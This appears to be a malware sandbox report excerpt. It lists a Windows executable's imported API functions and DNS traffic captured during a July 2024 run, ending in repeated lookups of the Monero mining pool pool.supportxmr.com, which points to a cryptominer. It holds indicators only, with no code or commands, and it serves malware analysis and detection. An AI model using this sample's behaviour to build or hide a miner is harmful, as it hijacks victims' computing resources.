KERNEL32.dll	SetEndOfFile, LocalCompact, GlobalLock, CreateHardLinkA, GetModuleHandleW, CreateNamedPipeW, GetProcessHeap, GetConsoleCP, GlobalAlloc, GetSystemDirectoryW, LoadLibraryW, IsProcessInJob, AssignProcessToJobObject, CreateEventA, CreateJobObjectA, GetConsoleAliasesW, GetLastError, SetLastError, GetProcAddress, PeekConsoleInputW, EnumDateFormatsExA, VerLanguageNameW, LoadLibraryA, IsBadHugeReadPtr, SetConsoleCtrlHandler, AddAtomW, HeapWalk, EnumResourceTypesW, SetEnvironmentVariableA, GetModuleFileNameA, GetOEMCP, EnumResourceNamesA, GetFileTime, FatalAppExitA, SetProcessShutdownParameters, SetFileShortNameA, GetDiskFreeSpaceExA, LCMapStringW, CreateFileW, CloseHandle, WriteConsoleW, FlushFileBuffers, HeapReAlloc, FindFirstVolumeMountPointW, CreateFileA, HeapFree, HeapAlloc, GetCommandLineA, HeapSetInformation, GetStartupInfoW, RaiseException, IsProcessorFeaturePresent, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, IsValidCodePage, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, DecodePointer, TlsFree, GetCurrentThreadId, HeapCreate, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, ExitProcess, WriteFile, GetModuleFileNameW, ReadFile, MultiByteToWideChar, SetFilePointer, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetStringTypeW, Sleep, GetConsoleMode, RtlUnwind, SetStdHandle, HeapSize
USER32.dll	CharUpperBuffW, GetMessageExtraInfo, DrawStateW, SetMenu, GetSysColorBrush, SetCaretPos, SetClipboardViewer
ADVAPI32.dll	RegSetValueA

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 24, 2024 02:39:15.661748886 CEST	192.168.2.4	1.1.1.1	0x7997	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:15.662075996 CEST	192.168.2.4	1.1.1.1	0x28f3	Standard query (0)	www.youtube.com	65	IN (0x0001)	false
Jul 24, 2024 02:39:19.304821014 CEST	192.168.2.4	1.1.1.1	0x8eae	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.305169106 CEST	192.168.2.4	1.1.1.1	0xb644	Standard query (0)	www.youtube.com	65	IN (0x0001)	false
Jul 24, 2024 02:39:19.624099016 CEST	192.168.2.4	1.1.1.1	0x26d	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.624380112 CEST	192.168.2.4	1.1.1.1	0xe9fa	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jul 24, 2024 02:39:21.303663015 CEST	192.168.2.4	1.1.1.1	0x700	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:21.304423094 CEST	192.168.2.4	1.1.1.1	0x82e1	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Jul 24, 2024 02:39:21.677318096 CEST	192.168.2.4	1.1.1.1	0xc2c5	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:21.677993059 CEST	192.168.2.4	1.1.1.1	0x9e79	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Jul 24, 2024 02:39:24.147051096 CEST	192.168.2.4	1.1.1.1	0xce79	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:24.152534962 CEST	192.168.2.4	1.1.1.1	0xec6d	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 24, 2024 02:39:24.153656960 CEST	192.168.2.4	1.1.1.1	0x73c6	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:24.153831959 CEST	192.168.2.4	1.1.1.1	0x7b5	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 24, 2024 02:39:24.238867044 CEST	192.168.2.4	1.1.1.1	0xb85f	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:24.239017963 CEST	192.168.2.4	1.1.1.1	0xdccf	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 24, 2024 02:39:25.689726114 CEST	192.168.2.4	1.1.1.1	0x2114	Standard query (0)	accounts.youtube.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:25.690304041 CEST	192.168.2.4	1.1.1.1	0x9d2d	Standard query (0)	accounts.youtube.com	65	IN (0x0001)	false
Jul 24, 2024 02:39:25.908925056 CEST	192.168.2.4	1.1.1.1	0x1192	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:25.954058886 CEST	192.168.2.4	1.1.1.1	0x19b5	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Jul 24, 2024 02:39:26.796996117 CEST	192.168.2.4	1.1.1.1	0x15e1	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:26.797116041 CEST	192.168.2.4	1.1.1.1	0x51a2	Standard query (0)	play.google.com	65	IN (0x0001)	false
Jul 24, 2024 02:39:27.640216112 CEST	192.168.2.4	1.1.1.1	0x2695	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:27.666313887 CEST	192.168.2.4	1.1.1.1	0xd8c	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:27.687638044 CEST	192.168.2.4	1.1.1.1	0x45f2	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Jul 24, 2024 02:39:28.152220964 CEST	192.168.2.4	1.1.1.1	0x3367	Standard query (0)	example.org	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:28.160346985 CEST	192.168.2.4	1.1.1.1	0x9033	Standard query (0)	ipv4only.arpa	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:28.162859917 CEST	192.168.2.4	1.1.1.1	0xb0f3	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:52.663633108 CEST	192.168.2.4	1.1.1.1	0xcc0c	Standard query (0)	firefox.settings.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:52.666465044 CEST	192.168.2.4	1.1.1.1	0x9d5d	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:52.672211885 CEST	192.168.2.4	1.1.1.1	0xf02c	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:52.673688889 CEST	192.168.2.4	1.1.1.1	0xc1bf	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Jul 24, 2024 02:39:52.679380894 CEST	192.168.2.4	1.1.1.1	0xcbf1	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Jul 24, 2024 02:39:52.774395943 CEST	192.168.2.4	1.1.1.1	0xbd28	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:52.783601999 CEST	192.168.2.4	1.1.1.1	0x13cb	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:52.793165922 CEST	192.168.2.4	1.1.1.1	0xd2ee	Standard query (0)	services.addons.mozilla.org	28	IN (0x0001)	false
Jul 24, 2024 02:39:53.136656046 CEST	192.168.2.4	1.1.1.1	0x6d07	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:53.248697996 CEST	192.168.2.4	1.1.1.1	0x46a2	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:40:23.005342960 CEST	192.168.2.4	1.1.1.1	0x1735	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:40:23.012820005 CEST	192.168.2.4	1.1.1.1	0x81ce	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Jul 24, 2024 02:40:43.464252949 CEST	192.168.2.4	1.1.1.1	0x6c6f	Standard query (0)	pool.supportxmr.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:40:58.503063917 CEST	192.168.2.4	1.1.1.1	0xea10	Standard query (0)	pool.supportxmr.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:41:11.117701054 CEST	192.168.2.4	1.1.1.1	0x6ef9	Standard query (0)	pool.supportxmr.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:41:29.770536900 CEST	192.168.2.4	1.1.1.1	0xa655	Standard query (0)	pool.supportxmr.com	A (IP address)	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 24, 2024 02:39:15.669370890 CEST	1.1.1.1	192.168.2.4	0x28f3	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:15.669370890 CEST	1.1.1.1	192.168.2.4	0x28f3	No error (0)	youtube-ui.l.google.com			65	IN (0x0001)	false
Jul 24, 2024 02:39:15.669496059 CEST	1.1.1.1	192.168.2.4	0x7997	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:15.669496059 CEST	1.1.1.1	192.168.2.4	0x7997	No error (0)	youtube-ui.l.google.com		142.250.185.110	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:15.669496059 CEST	1.1.1.1	192.168.2.4	0x7997	No error (0)	youtube-ui.l.google.com		142.250.186.142	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:15.669496059 CEST	1.1.1.1	192.168.2.4	0x7997	No error (0)	youtube-ui.l.google.com		142.250.184.238	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:15.669496059 CEST	1.1.1.1	192.168.2.4	0x7997	No error (0)	youtube-ui.l.google.com		142.250.184.206	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:15.669496059 CEST	1.1.1.1	192.168.2.4	0x7997	No error (0)	youtube-ui.l.google.com		172.217.16.206	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:15.669496059 CEST	1.1.1.1	192.168.2.4	0x7997	No error (0)	youtube-ui.l.google.com		172.217.16.142	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:15.669496059 CEST	1.1.1.1	192.168.2.4	0x7997	No error (0)	youtube-ui.l.google.com		142.250.185.174	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:15.669496059 CEST	1.1.1.1	192.168.2.4	0x7997	No error (0)	youtube-ui.l.google.com		172.217.18.110	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:15.669496059 CEST	1.1.1.1	192.168.2.4	0x7997	No error (0)	youtube-ui.l.google.com		142.250.74.206	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:15.669496059 CEST	1.1.1.1	192.168.2.4	0x7997	No error (0)	youtube-ui.l.google.com		142.250.185.78	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:15.669496059 CEST	1.1.1.1	192.168.2.4	0x7997	No error (0)	youtube-ui.l.google.com		142.250.186.174	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:15.669496059 CEST	1.1.1.1	192.168.2.4	0x7997	No error (0)	youtube-ui.l.google.com		142.250.185.206	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:15.669496059 CEST	1.1.1.1	192.168.2.4	0x7997	No error (0)	youtube-ui.l.google.com		142.250.185.142	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:15.669496059 CEST	1.1.1.1	192.168.2.4	0x7997	No error (0)	youtube-ui.l.google.com		216.58.206.46	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:15.669496059 CEST	1.1.1.1	192.168.2.4	0x7997	No error (0)	youtube-ui.l.google.com		142.250.186.110	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:15.669496059 CEST	1.1.1.1	192.168.2.4	0x7997	No error (0)	youtube-ui.l.google.com		172.217.18.14	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.311747074 CEST	1.1.1.1	192.168.2.4	0xb644	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:19.311747074 CEST	1.1.1.1	192.168.2.4	0xb644	No error (0)	youtube-ui.l.google.com			65	IN (0x0001)	false
Jul 24, 2024 02:39:19.311762094 CEST	1.1.1.1	192.168.2.4	0x8eae	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:19.311762094 CEST	1.1.1.1	192.168.2.4	0x8eae	No error (0)	youtube-ui.l.google.com		216.58.212.174	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.311762094 CEST	1.1.1.1	192.168.2.4	0x8eae	No error (0)	youtube-ui.l.google.com		216.58.206.78	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.311762094 CEST	1.1.1.1	192.168.2.4	0x8eae	No error (0)	youtube-ui.l.google.com		142.250.186.110	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.311762094 CEST	1.1.1.1	192.168.2.4	0x8eae	No error (0)	youtube-ui.l.google.com		142.250.74.206	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.311762094 CEST	1.1.1.1	192.168.2.4	0x8eae	No error (0)	youtube-ui.l.google.com		142.250.185.238	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.311762094 CEST	1.1.1.1	192.168.2.4	0x8eae	No error (0)	youtube-ui.l.google.com		172.217.16.206	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.311762094 CEST	1.1.1.1	192.168.2.4	0x8eae	No error (0)	youtube-ui.l.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.311762094 CEST	1.1.1.1	192.168.2.4	0x8eae	No error (0)	youtube-ui.l.google.com		142.250.184.238	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.311762094 CEST	1.1.1.1	192.168.2.4	0x8eae	No error (0)	youtube-ui.l.google.com		142.250.186.46	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.311762094 CEST	1.1.1.1	192.168.2.4	0x8eae	No error (0)	youtube-ui.l.google.com		172.217.18.14	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.311762094 CEST	1.1.1.1	192.168.2.4	0x8eae	No error (0)	youtube-ui.l.google.com		172.217.16.142	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.311762094 CEST	1.1.1.1	192.168.2.4	0x8eae	No error (0)	youtube-ui.l.google.com		142.250.184.206	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.311762094 CEST	1.1.1.1	192.168.2.4	0x8eae	No error (0)	youtube-ui.l.google.com		142.250.185.206	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.311762094 CEST	1.1.1.1	192.168.2.4	0x8eae	No error (0)	youtube-ui.l.google.com		142.250.185.142	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.311762094 CEST	1.1.1.1	192.168.2.4	0x8eae	No error (0)	youtube-ui.l.google.com		142.250.186.78	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.311762094 CEST	1.1.1.1	192.168.2.4	0x8eae	No error (0)	youtube-ui.l.google.com		142.250.185.174	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.630779982 CEST	1.1.1.1	192.168.2.4	0x26d	No error (0)	www.google.com		142.250.185.228	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:19.630923033 CEST	1.1.1.1	192.168.2.4	0xe9fa	No error (0)	www.google.com			65	IN (0x0001)	false
Jul 24, 2024 02:39:21.311063051 CEST	1.1.1.1	192.168.2.4	0x700	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:21.311080933 CEST	1.1.1.1	192.168.2.4	0x82e1	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:21.684381962 CEST	1.1.1.1	192.168.2.4	0xc2c5	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:21.684381962 CEST	1.1.1.1	192.168.2.4	0xc2c5	No error (0)	googlehosted.l.googleusercontent.com		172.217.18.1	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:21.686851978 CEST	1.1.1.1	192.168.2.4	0x9e79	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:22.998893023 CEST	1.1.1.1	192.168.2.4	0x9a8a	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:22.998893023 CEST	1.1.1.1	192.168.2.4	0x9a8a	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:23.028137922 CEST	1.1.1.1	192.168.2.4	0xb6a4	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:24.010840893 CEST	1.1.1.1	192.168.2.4	0x9cc5	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:24.054811954 CEST	1.1.1.1	192.168.2.4	0x3f7	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:24.054811954 CEST	1.1.1.1	192.168.2.4	0x3f7	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:24.154069901 CEST	1.1.1.1	192.168.2.4	0xce79	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:24.154069901 CEST	1.1.1.1	192.168.2.4	0xce79	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:24.159213066 CEST	1.1.1.1	192.168.2.4	0xec6d	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jul 24, 2024 02:39:24.160765886 CEST	1.1.1.1	192.168.2.4	0x73c6	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:24.160765886 CEST	1.1.1.1	192.168.2.4	0x73c6	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:24.160831928 CEST	1.1.1.1	192.168.2.4	0x7b5	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jul 24, 2024 02:39:24.245728016 CEST	1.1.1.1	192.168.2.4	0xb85f	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:24.245728016 CEST	1.1.1.1	192.168.2.4	0xb85f	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:24.245737076 CEST	1.1.1.1	192.168.2.4	0xdccf	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jul 24, 2024 02:39:25.696568966 CEST	1.1.1.1	192.168.2.4	0x2114	No error (0)	accounts.youtube.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:25.696568966 CEST	1.1.1.1	192.168.2.4	0x2114	No error (0)	www3.l.google.com		142.250.185.142	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:25.697124004 CEST	1.1.1.1	192.168.2.4	0x9d2d	No error (0)	accounts.youtube.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:25.892802954 CEST	1.1.1.1	192.168.2.4	0xc9c0	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:25.915985107 CEST	1.1.1.1	192.168.2.4	0x1192	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:26.056777000 CEST	1.1.1.1	192.168.2.4	0x6cb6	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:26.056777000 CEST	1.1.1.1	192.168.2.4	0x6cb6	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:26.808752060 CEST	1.1.1.1	192.168.2.4	0x15e1	No error (0)	play.google.com		142.250.186.142	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:27.198726892 CEST	1.1.1.1	192.168.2.4	0x6cb6	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:27.198726892 CEST	1.1.1.1	192.168.2.4	0x6cb6	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:27.647725105 CEST	1.1.1.1	192.168.2.4	0x2695	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:27.647725105 CEST	1.1.1.1	192.168.2.4	0x2695	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:27.673105001 CEST	1.1.1.1	192.168.2.4	0xd8c	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:27.694652081 CEST	1.1.1.1	192.168.2.4	0x45f2	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Jul 24, 2024 02:39:28.093641996 CEST	1.1.1.1	192.168.2.4	0x6cb6	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:28.093641996 CEST	1.1.1.1	192.168.2.4	0x6cb6	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:28.158890963 CEST	1.1.1.1	192.168.2.4	0x3367	No error (0)	example.org		93.184.215.14	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:28.166851997 CEST	1.1.1.1	192.168.2.4	0x9033	No error (0)	ipv4only.arpa		192.0.0.171	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:28.166851997 CEST	1.1.1.1	192.168.2.4	0x9033	No error (0)	ipv4only.arpa		192.0.0.170	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:28.169750929 CEST	1.1.1.1	192.168.2.4	0xb0f3	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:28.169750929 CEST	1.1.1.1	192.168.2.4	0xb0f3	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:30.105104923 CEST	1.1.1.1	192.168.2.4	0x6cb6	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:30.105104923 CEST	1.1.1.1	192.168.2.4	0x6cb6	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:34.108845949 CEST	1.1.1.1	192.168.2.4	0x6cb6	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:34.108845949 CEST	1.1.1.1	192.168.2.4	0x6cb6	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:52.664705038 CEST	1.1.1.1	192.168.2.4	0x5933	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:52.664705038 CEST	1.1.1.1	192.168.2.4	0x5933	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:52.671382904 CEST	1.1.1.1	192.168.2.4	0xcc0c	No error (0)	firefox.settings.services.mozilla.com	prod.remote-settings.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:52.671382904 CEST	1.1.1.1	192.168.2.4	0xcc0c	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:52.673197031 CEST	1.1.1.1	192.168.2.4	0x9d5d	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:52.678924084 CEST	1.1.1.1	192.168.2.4	0xf02c	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:52.782438993 CEST	1.1.1.1	192.168.2.4	0xbd28	No error (0)	services.addons.mozilla.org		143.204.215.122	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:52.782438993 CEST	1.1.1.1	192.168.2.4	0xbd28	No error (0)	services.addons.mozilla.org		143.204.215.115	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:52.782438993 CEST	1.1.1.1	192.168.2.4	0xbd28	No error (0)	services.addons.mozilla.org		143.204.215.105	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:52.782438993 CEST	1.1.1.1	192.168.2.4	0xbd28	No error (0)	services.addons.mozilla.org		143.204.215.18	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:52.792705059 CEST	1.1.1.1	192.168.2.4	0x13cb	No error (0)	services.addons.mozilla.org		143.204.215.18	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:52.792705059 CEST	1.1.1.1	192.168.2.4	0x13cb	No error (0)	services.addons.mozilla.org		143.204.215.122	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:52.792705059 CEST	1.1.1.1	192.168.2.4	0x13cb	No error (0)	services.addons.mozilla.org		143.204.215.105	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:52.792705059 CEST	1.1.1.1	192.168.2.4	0x13cb	No error (0)	services.addons.mozilla.org		143.204.215.115	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:53.143521070 CEST	1.1.1.1	192.168.2.4	0x6d07	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:53.143521070 CEST	1.1.1.1	192.168.2.4	0x6d07	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:53.255599022 CEST	1.1.1.1	192.168.2.4	0x46a2	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:53.255599022 CEST	1.1.1.1	192.168.2.4	0x46a2	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:53.554716110 CEST	1.1.1.1	192.168.2.4	0x5ffa	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 02:39:53.554716110 CEST	1.1.1.1	192.168.2.4	0x5ffa	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Jul 24, 2024 02:39:54.042900085 CEST	1.1.1.1	192.168.2.4	0x53e	No error (0)	a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com	a17.rackcdn.com		CNAME (Canonical name)	IN (0x0001)	false
